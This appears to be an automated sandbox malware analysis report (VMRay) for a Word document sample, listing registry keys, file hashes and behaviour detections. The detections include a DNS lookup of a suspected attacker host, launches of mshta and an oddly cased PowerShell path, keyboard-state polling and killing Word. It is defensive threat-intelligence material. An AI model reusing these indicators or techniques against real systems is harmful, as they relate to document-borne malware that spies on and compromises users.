HKEY_LOCAL_MACHINE StackVersion StackVersion WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts 
HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Application HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Media Center HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\OAlerts HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\System HKEY_LOCAL_MACHINE WinRegistryKey SYSTEM\CurrentControlSet\Services\EventLog\Windows 
Analyzed Sample #19989
Malware Artifacts 19989
Sample-ID: #19989 Job-ID: #12711
This sample was analyzed by VMRay Analyzer 2.2.0 on a Windows 7 system 0 VTI Score based on VTI Database Version 2.6
Metadata of Sample File #19989
Submission-ID: #20151
C:\Users\aETAdzjz\Desktop\Playkey.doc doc
MD5 9587a58c5d456ca4fb8d8abba0945861
SHA1 18bb1da68d2073efb52ce3792311b15e958d85a5
SHA256 7a641c8fa1b7a428bfb66d235064407ab56d119411fbaca6268c8e69696e6729
Opened_By
Metadata of Analysis for Job-ID #12711
Timeout True x86 64-bit win7_64_sp1-mso2016 True Windows 7 6.1.7601.17514 (3844dbb9-2017-4967-be7a-a4a2c20430fa) 158.12
This is a property collection for additional information of VMRay analysis
VMRay Analyzer
Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "Global\.net clr networking". Create system object
Network VTI rule match with VTI rule score 3/5 vmray_request_dns_by_name Resolve host name "www.samyrai777m.p-host.in". Perform DNS request
Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process ""C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.cmdline"". Create process
Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Windows\System32\mshta.exe". Create process
Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "Local\!PrivacIE!SharedMemory!Mutex". Create system object
Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Windows\SYSteM32\windowspOweRSHeLL\V1.0\PoWErSHELL.Exe". Create process
Device VTI rule match with VTI rule score 3/5 vmray_hook_key_by_keystate_api Frequently read the state of a keyboard key by API. Monitor keyboard input
Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process ""C:\Windows\system32\taskkill.exe" /f /im winword.exe". Create process